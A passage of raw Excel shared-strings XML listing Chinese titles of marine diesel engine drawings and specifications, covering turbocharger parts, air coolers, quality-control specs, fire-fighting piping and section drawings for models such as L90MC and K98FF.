        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射辅助装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>径向轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器，备件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气导向</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机叶轮轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮端轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴总成部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖（涡轮增压器）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气测量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球轴承布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气过滤器箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶带支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带密封夹箍</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带毂棘轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水洗阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图纸摘要</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器外形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>LKV-LKW</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配图</t>
    </r>
  </si>
  <si>
    <r>
      <t>LLK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>SLK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热交换器附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器安装螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器推动工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器部件取出器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>末端终止板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干洗罐</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板超声波检查质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀研磨机质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压双层管生产建议</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造带肋活塞头质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接排气阀座质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接活塞头质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造曲柄质量规范</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造蓄压块质量规范</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面淬火生产规范</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磷酸锰生产建议</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环槽硬化质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀孔修复质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀表面硬化生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发环安装生产建议</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵盖压力测试生产建议</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵装配生产建议</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套首次制造质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端管连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车间实验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>露点报警</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>洒水器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器变更</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒压布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔断布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火器表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射辅助管支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>Y56F</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>K67GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L90GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L80GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>K98FF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>K62+62VT2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>K42+42VT2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>L45GF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L90MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L80MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L70MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L60MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L50MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>S60MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>K80MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>K90MC-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>K80MC-C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>S50MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>S90MC-T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术文件</t>
    </r>
    <r>
